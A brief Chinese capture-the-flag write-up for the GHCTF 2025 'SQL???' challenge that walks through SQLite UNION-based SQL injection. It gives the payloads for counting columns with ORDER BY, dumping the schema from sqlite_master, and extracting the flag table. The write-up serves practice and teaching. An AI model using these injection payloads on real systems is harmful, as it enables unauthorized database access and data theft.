[GHCTF 2025]SQL???

打开题目在线环境:

先尝试注入:

id=1;show databases;

发现报错,后来看了wp才知道这个题目是SQLite注入。

我看的是这个师傅的wp:

https://blog.csdn.net/2401_86190146/article/details/146164505?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522b2e94c28c4b9713fffb8456c983de1b3%2522%252C%2522scm%2522%253A%252220140713.130102334...%2522%257D\&request_id=b2e94c28c4b9713fffb8456c983de1b3\&biz_id=0\&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend\~default-1-146164505-null-null.142^v102^pc_search_result_base9\&utm_term=[GHCTF 2025]SQL\&spm=1018.2226.3001.4187

1.先判断有几列

python 复制代码
? id=1 order by 6 #

到第六列时:

2.爆出来表名

python 复制代码
/?id=1 union select 1,2,3,4,group_concat(sql) from sqlite_master

所以我们要找的就是flag表里的flag列

直接payload:

python 复制代码
/?id=1 union select 1,2,3,4,flag from flag

在这里插入图片描述

相关推荐
C_Si沉思3 分钟前
C++中的状态模式高级应用
开发语言·c++·算法
编程学习0013 分钟前
记一次Java面试
java·面试
计算机学姐6 分钟前
基于SpringBoot+Vue的家政服务预约系统【个性化推荐+数据可视化】
java·vue.js·spring boot·后端·mysql·信息可视化·java-ee
一只大袋鼠6 分钟前
请求转发vs重定向、同源策略与跨域
java·javaweb·同源策略·请求转发·重定向
小胖java7 分钟前
基于LDA主题模型与情感分析的航空客户满意度分析
java·spring boot·spring
左左右右左右摇晃10 分钟前
Java并发——Lock锁
java·开发语言·笔记
森林里的程序猿猿10 分钟前
导致内存泄漏的ThreadLocal详解
java·jvm·数据结构
wangchunting11 分钟前
Java设计模式
java·单例模式·设计模式
聆风吟º13 分钟前
【C标准库】深入理解C语言memcpy函数:用法、原理与避坑指南
c语言·开发语言·memcpy·库函数
书到用时方恨少!13 分钟前
基于 Three.js 的 3D 地球可视化项目
开发语言·javascript·3d